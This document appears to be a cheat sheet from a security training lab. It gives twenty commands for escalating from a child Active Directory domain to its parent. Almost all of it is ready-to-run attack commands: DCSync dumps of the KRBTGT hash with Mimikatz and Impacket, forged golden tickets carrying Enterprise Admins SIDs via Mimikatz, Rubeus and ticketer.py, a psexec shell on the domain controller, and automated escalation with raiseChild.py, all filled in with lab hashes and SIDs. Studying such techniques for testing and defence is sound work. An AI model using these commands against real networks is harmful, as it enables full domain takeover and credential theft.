Trust Relationships - Child > Parent Trusts
1. Import Active Directory Module
Command:
Import-Module activedirectoryDescription: Imports the Active Directory module.
2. Enumerate Domain Trusts (PowerShell)
Command:
Get-ADTrust -Filter *Description: Enumerates trust relationships of a Windows domain.
3. Enumerate Domain Trusts (PowerView)
Command:
Get-DomainTrustDescription: Retrieves trust relationships of a Windows domain.
4. Perform Domain Trust Mapping
Command:
Get-DomainTrustMappingDescription: Maps domain trust relationships.
5. Enumerate Users in a Child Domain
Command:
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountNameDescription: Lists users in a child domain.
6. Extract KRBTGT Hash via DCSync
Command:
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgtDescription: Retrieves the NT Hash of the KRBTGT account using Mimikatz.
7. Get Domain SID
Command:
Get-DomainSIDDescription: Retrieves the Security Identifier (SID) of a domain.
8. Retrieve Enterprise Admins Group SID
Command:
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsidDescription: Retrieves the SID of the Enterprise Admins group.
9. List C Drive Contents of a Domain Controller
Command:
ls \\academy-ea-dc01.inlanefreight.local\c$Description: Attempts to list the C drive contents of a Domain Controller.
10. Create a Golden Ticket (Mimikatz)
Command:
mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /pttDescription: Generates a Golden Ticket with Mimikatz.
11. Create a Golden Ticket (Rubeus)
Command:
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /pttDescription: Generates a Golden Ticket with Rubeus.
12. Perform DCSync Attack (Mimikatz)
Command:
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_admDescription: Extracts domain hashes via DCSync attack.
13. Perform DCSync Attack (Impacket)
Command:
secretsdump.py logistics.inlanefreight.local/htbstudent_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgtDescription: Uses Impacket to perform a DCSync attack.
14. Perform SID Brute-Forcing
Command:
lookupsid.py logistics.inlanefreight.local/htbstudent_adm@172.16.5.240Description: Enumerates SIDs in a Windows domain.
15. Retrieve Domain SID
Command:
lookupsid.py logistics.inlanefreight.local/htbstudent_adm@172.16.5.240 | grep "Domain SID"Description: Extracts the SID of a target domain.
16. Retrieve Enterprise Admins SID
Command:
lookupsid.py logistics.inlanefreight.local/htbstudent_adm@172.16.5.5 | grep -B12 "Enterprise Admins"Description: Retrieves the SID of the Enterprise Admins group.
17. Create a Golden Ticket (Impacket)
Command:
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hackerDescription: Uses Impacket to generate a Golden Ticket.
18. Set Kerberos Ticket Cache
Command:
export KRB5CCNAME=hacker.ccacheDescription: Sets the Kerberos ticket cache environment variable.
19. Establish a Shell on Domain Controller
Command:
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5Description: Uses Impacket to establish a session with the Domain Controller.
20. Escalate from Child to Parent Domain
Command:
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_admDescription: Performs an automated escalation attack from child to parent domain.
Last updated